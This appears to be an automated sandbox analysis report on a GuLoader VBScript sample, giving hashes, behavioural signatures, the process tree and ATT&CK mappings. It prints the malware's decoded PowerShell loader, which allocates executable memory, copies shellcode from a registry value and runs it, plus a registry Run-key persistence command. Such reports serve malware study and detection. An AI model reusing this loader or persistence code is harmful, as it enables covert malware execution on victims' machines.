Analysis
-
max time kernel
147s -
max time network
148s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
26-12-2024 20:33
Static task
static1
Behavioral task
behavioral1
Sample
JaffaCakes118_7d920532b4b748249e809c93368dc5c317479dfa2855df5dc8f559c6936205f9.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
JaffaCakes118_7d920532b4b748249e809c93368dc5c317479dfa2855df5dc8f559c6936205f9.vbs
Resource
win10v2004-20241007-en
General
-
Target
JaffaCakes118_7d920532b4b748249e809c93368dc5c317479dfa2855df5dc8f559c6936205f9.vbs
-
Size
344KB
-
MD5
26c1961c629a942788089f89b1cac50c
-
SHA1
935559fe62e2178e4efc45a31ab1d11488d8412c
-
SHA256
7d920532b4b748249e809c93368dc5c317479dfa2855df5dc8f559c6936205f9
-
SHA512
5ca13c271e755ff13a6926a20773af65c4aa755a92f4a4e3891558675acd0738b2fcdf1873bd1545a21ebcae771275ec35ff36c866b0cd9be8970a7f11a415ce
-
SSDEEP
1536:N64IoY2vqki1BN/cjGRhMR+ebjz9IjRmvog6nCaysWYp2IazMRAt6DziIwNFczqt:KoRyk1SXCXz99vog6jysuMRkmiIY+y
Malware Config
Signatures
-
Guloader family
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Checks QEMU agent file 2 TTPs 2 IoCs
Checks presence of QEMU agent, possibly to detect virtualization.
description ioc Process File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe powershell.exe File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe ieinstal.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\Perchl67 = "%Ostun% -w 1 $Indl=(Get-ItemProperty -Path 'HKCU:\\SOFTWARE\\AppDataLow\\').Labbeuvu;%Ostun% -encodedcommand($Indl)" ieinstal.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2060 powershell.exe 2944 ieinstal.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2060 set thread context of 2944 2060 powershell.exe 34 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ieinstal.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2060 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2060 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2060 powershell.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 2168 wrote to memory of 2060 2168 WScript.exe 30 PID 2168 wrote to memory of 2060 2168 WScript.exe 30 PID 2168 wrote to memory of 2060 2168 WScript.exe 30 PID 2168 wrote to memory of 2060 2168 WScript.exe 30 PID 2060 wrote to memory of 3004 2060 powershell.exe 32 PID 2060 wrote to memory of 3004 2060 powershell.exe 32 PID 2060 wrote to memory of 3004 2060 powershell.exe 32 PID 2060 wrote to memory of 3004 2060 powershell.exe 32 PID 3004 wrote to memory of 2284 3004 csc.exe 33 PID 3004 wrote to memory of 2284 3004 csc.exe 33 PID 3004 wrote to memory of 2284 3004 csc.exe 33 PID 3004 wrote to memory of 2284 3004 csc.exe 33 PID 2060 wrote to memory of 2944 2060 powershell.exe 34 PID 2060 wrote to memory of 2944 2060 powershell.exe 34 PID 2060 wrote to memory of 2944 2060 powershell.exe 34 PID 2060 wrote to memory of 2944 2060 powershell.exe 34 PID 2060 wrote to memory of 2944 2060 powershell.exe 34 PID 2060 wrote to memory of 2944 2060 powershell.exe 34 PID 2060 wrote to memory of 2944 2060 powershell.exe 34 PID 2060 wrote to memory of 2944 2060 powershell.exe 34
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_7d920532b4b748249e809c93368dc5c317479dfa2855df5dc8f559c6936205f9.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2168 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "# I n d i   T e t r a   P e r r a d   N d v e   A t t r u p s   E f t e r g i   B e g y n   P u r l i   B a s i   L a v v   H e a d l i   I s b n   a f a r t e r n e   T i l b a g e d a t   H i g h l y r   U n l o v e l i e   G d s k   U d s i g   S p i n c o v a   S a n k e k o   F u n d   d e n o t a t i   S i n s o p s g   Z y g o s   E m p y r e u   T o a s t e d   N o n e n   X e r o g r a p h   L a t i g    
 # P a r t r i   M u t a r o t a t   T r a l l   S e m i h i s t   Z y g o m y c e   T i g e r e n   C e n t r   S t u t   V a g t p o   C h a r m e   K y n d e l m i s   B e t r   l a s s i   P h i l i   l o v o v e r t r   M o u i l l e b r   T u b a t e b i   A f v n n e d e   T w i l i   A l c a i   L t n i n g p u l   M u c i n    
 # S l b e r n e   b i l l e d   T e l e v   V e r d e n s   C o n s e c r   A r b e j d s f o   F e r i e u g e u d   F l a m b   B r i l l e   A d z e r   T h e o r e t i   E n c h a s e   s l a n g   B o r t f    
 $ M a s t e r M i n d   =   [ c h a r ] 3 4   +   " N "   +   " t A l "   +   " l o c "   +   " a t e " + " V i "   +   " r t u a l "   +   " M e m o r y "   +   [ c h a r ] 3 4  
  
 # F i n t m a s k   R o k k e d e   C o n s i   S u b d e f i   N e p o t i s t   P u p i l   F e s t l i g h o l   F o r s t y r   P r o d u k t a n s   N e p h r a d e   R i b b o n f   I n v i o l a t e d   P u d e n t t e   M e l a n c h o   P r o e p i m e r o   S k i f t   M e r k a n t i l i   B e g y n d e l s e   C e r u l e   S o m a   K e g l e r s f r e   T a n d g l a s   O u t p a c e s c r   A a b n i n g   V a n g l    
 # D y s t o m o u s y   E i r e   C a p l i n c   S m r r   S c h a c h t s c   C o l o s t r u   N s e v r d i g e n   S e m i h i   N i t r   M o i r e s m a a p   A t e l i e r   S k o k k   P a r t i c   N o n a c   R a m i   D u c h e s s e    
 # F i n g e r s p i d   A v l s h i n   I n c i v   P r e d e   S t a t i o   r e v i n d   K a i l y a r d e r   E l e a z a r b   P r o p i t   B a s h j   H u l s k e e    
  
  
 A d d - T y p e   - T y p e D e f i n i t i o n   @ "  
 u s i n g   S y s t e m ;  
 u s i n g   S y s t e m . R u n t i m e . I n t e r o p S e r v i c e s ;  
 p u b l i c   s t a t i c   c l a s s   U n e u p h o 1  
 {  
 [ D l l I m p o r t ( " k e r n e l 3 2 " ) ] p u b l i c   s t a t i c   e x t e r n   v o i d   S l e e p E x ( i n t   B r a d y s p 0 ) ;  
 [ D l l I m p o r t ( " u s e r 3 2 " ) ] p u b l i c   s t a t i c   e x t e r n   v o i d   G e t W i n d o w D C ( ) ;  
  
 [ D l l I m p o r t ( " n t d l l " ,   E n t r y P o i n t = $ M a s t e r M i n d ) ] p u b l i c   s t a t i c   e x t e r n   i n t   V i t r o S o l i d ( i n t   U n e u p h o 6 , r e f   I n t 3 2   B i l l e r 2 1 4 , i n t   S t r a n d f , r e f   I n t 3 2   U n e u p h o , i n t   O v e r p a i n t r , i n t   U n e u p h o 7 ) ;  
 [ D l l I m p o r t ( " D 2 s t a m p " ) ] p u b l i c   s t a t i c   e x t e r n   v o i d   P o o l S t a c k ( ) ;  
 [ D l l I m p o r t ( " u s e r 3 2 " ,   E n t r y P o i n t = " E n u m W i n d o w s " ) ] p u b l i c   s t a t i c   e x t e r n   I n t P t r   M o r q q ( u i n t   S t r a n d f 5 , i n t   S t r a n d f 6 ) ;  
 [ D l l I m p o r t ( " k e r n e l 3 2 " ) ] p u b l i c   s t a t i c   e x t e r n   v o i d   R t l M o v e M e m o r y ( I n t P t r   S t r a n d f 1 , r e f   I n t 3 2   S t r a n d f 2 , i n t   S t r a n d f 3 ) ;  
  
 }  
 " @  
 # S e m a n t i   P r e s l i c   R a n u l a s t o   S o i r e e   U n d d r a g e   F u s s p   P l e i   S t e r n   S c o t c h w   S a c c h a r o c   F o d f s   S p a n i e l w   D e m o   H y p o f   S i a l o a n   S t o r m f a l d   F r g e   I n d e k l i m   T j e n   C h a r m   E s p i e r n   S p a t i n g s   T i g h   p o l y i m i d e p   K u e l s e p r   E r i n d   S w e l l   T i l e      
 $ U n e u p h o 3 = 0 ;  
 # R e e m i g r   T a y r   E v a n g e l i   M e c k e l i a n   t e m p e l   D i s a r r a y s   S t r a a l i n g   B a r o s m a p   E m e r g e r s   P o s e t b a s   P r e t r i   A a l a n d s k m a   O v e r t a l    
 $ U n e u p h o 9 = 1 0 4 8 5 7 6 ;  
 # N o r d m n d   F i l k a l d   S e t t e r   P r o p o s i t i   R e n s k   P r e p   M a n d a l a y   A n k r i n g s a f   S a l t i g r a   S j i p p e s o   h o r n i e r   H y g r o   D i n e r s   T r n e n   T r e m a n   G a m l i n g b n    
 $ U n e u p h o 8 = [ U n e u p h o 1 ] : : V i t r o S o l i d ( - 1 , [ r e f ] $ U n e u p h o 3 , 0 , [ r e f ] $ U n e u p h o 9 , 1 2 2 8 8 , 6 4 )  
 # U n e n v i r o   I n d l e v e r e   E f t e   O p a c o u s n   E v e n   C h a r g e r e   S a t s   R e f l   P a m o r t h o p e   u b e k v e m m   D i c t a m   T e l e g r   H i p b e r    
 $ B e g r = ( G e t - I t e m P r o p e r t y   - P a t h   " H K C U : \ S o f t w a r e \ D e f o s s " ) . S a n c y p e s t i  
 # B u n d r e k o   R e k t i f   U n c o m p a t i   H a e v d o v e   O e u v r   P h o t o   S a l t c h u c k e   B o r g h e r r e n   S i k r i n g s s   D u n c h f l i s   A n i m i z e d   L i n i n g t r i   B h a v a n a d   F a v o r i   A p o t y p i c p   S v a l i n   K v a n   C y p r i   F l l e d e   I m p e   S t u d i e k o   D o s m e r e n p a   T a l l   L e v n e d   U n d e r h a a n d   S t e l l e n d e   C l u m s i n   R e h a b   C o l l   S y s t e m f   I d e a i s t i c   I m p u t a b l   G r a v i t a t    
 $ B e d r   =   [ S y s t e m . B y t e [ ] ] : : C r e a t e I n s t a n c e ( [ S y s t e m . B y t e ] , $ B e g r . L e n g t h   /   2 )  
 # T a l e p d a g o   R u s k r e g n e n   O v e r l e w   S k i f   I n i q u i t i e   r o a d w   u d s l u   B e t r k   T o r n e s t r   L u m b a r s   P a r o n   T o r v e h a n d e   U d m a t r i   S i d a l c   M e r c e    
 F o r ( $ i = 0 ;   $ i   - l t   $ B e g r . L e n g t h ;   $ i + = 2 )  
 	 {  
                 $ B e d r [ $ i / 2 ]   =   [ c o n v e r t ] : : T o B y t e ( $ B e g r . S u b s t r i n g ( $ i ,   2 ) ,   1 6 )  
         }  
  
  
 f o r ( $ S t e r e o 1 2 5 = 0 ;   $ S t e r e o 1 2 5   - l t   $ B e d r . c o u n t   ;   $ S t e r e o 1 2 5 + + )  
 {  
 	  
 [ U n e u p h o 1 ] : : R t l M o v e M e m o r y ( $ U n e u p h o 3 + $ S t e r e o 1 2 5 , [ r e f ] $ B e d r [ $ S t e r e o 1 2 5 ] , 1 )  
  
 }  
 [ U n e u p h o 1 ] : : M o r q q ( $ U n e u p h o 3 ,   0 )  
  
  
 "2⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2060 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\9dxjs_-h.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8EC9.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8EC8.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2284
-
-
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"3⤵
- Checks QEMU agent file
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:2944
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Modify Registry
1Obfuscated Files or Information
1Command Obfuscation
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD586eeccd412b0611b904e6b7cee9a9ebc
SHA18906b31330b2c60dedbefe3c581f49b1bb7dfade
SHA2562154de0277d00d2a9ed605feabe40e25bcfc5f10f365ea01b05448c0d48ce79e
SHA5125c2e597bbb2b8f3c3f72f775d9a17add8e335655b1635175a8c39f37169f3dbf873a4a869b1c5d5f6df9a5d96f5aa59a225d8622881478ba0fb163b7ac739ae3
-
Filesize
7KB
MD5ddc7f6cd16d069cb9562d267e9db9296
SHA151a147d5f97ae7efad3660bc920203a49f4b1726
SHA256bb14e8ccfeb8bfa91861653cac440d27a48e1f585fe2bcf16771752b38eb6c4a
SHA5128c2053a245916eaac60e901f530e2a317a5892a319f8e608f62e1352bddb84de446a1ba57d1b65009079c6b81e3350b7e79ded7e41e1c6ddabbe2220868284f5
-
Filesize
1KB
MD54045d2cd8c556267c4f3b2f1c0eccd4d
SHA11baebacbc370aa7c086b37d937f5c5848589798e
SHA2560fc3801ccb8fe168332ea2e87471c6fa50a08e3021fb119796688a72462241ff
SHA512b6d739211edae0b7d4b1887f6dc4b14e2ef5e29d8eb0abf7ec5e50793da916ae77f773761d0387d1a3815718dae172d7bb10ac0455cd476eb2b78db978457f7d
-
Filesize
706B
MD52f2d59ad9746f83211ab41b81f4ffb53
SHA13266d96213f29e9d3b556b124df0f617e30e6037
SHA256841ca0fdae8cb9d8d1c70b96dd57ba4fd2c6df399be995b63028a9e9b218d1b9
SHA512e5baea9a9115a2cd410894f140099b5c6a2acf494c1f5b6ee773ea2513b067039f4f7dffdb83ca60e7793fbb2be23b29fab1c4a5ca72844d75a77b02696ccde2
-
Filesize
309B
MD55e16c1a5844bec09ea7735c386f4a0d0
SHA1d5ebbc2e052d13a2911f8bfa60eaf74a2296647b
SHA256505f7fd13c801923e1eb5e7e6f8d6f10745a148adfcd8a352d3316679e73bd26
SHA5124647cfcdc13eba116313606cf4b64ee0e87cbc2fe24d52b2c2bda5847db055f7c3a579ddca2f7bc0b9f69074f008395e6fef5890fd311798bfdeecd668991603
-
Filesize
652B
MD59526e488ee9c2226419fe16b57b5f091
SHA1a7a982b25a0bdaeda8258894ef2db7d24442900d
SHA25679326bee850955621515eb9f5a470ac7204ef53127a209b804b1fddd3d5f8dbb
SHA512e8a9db9980cc704a9b1cd2f325ec096ef80e97bd6a280ef5d517081e22873b545d6b5232c5a5913a514439e359e1c5d63b9afc1cfe2d2c0c44ef5e6bd5dd0c2e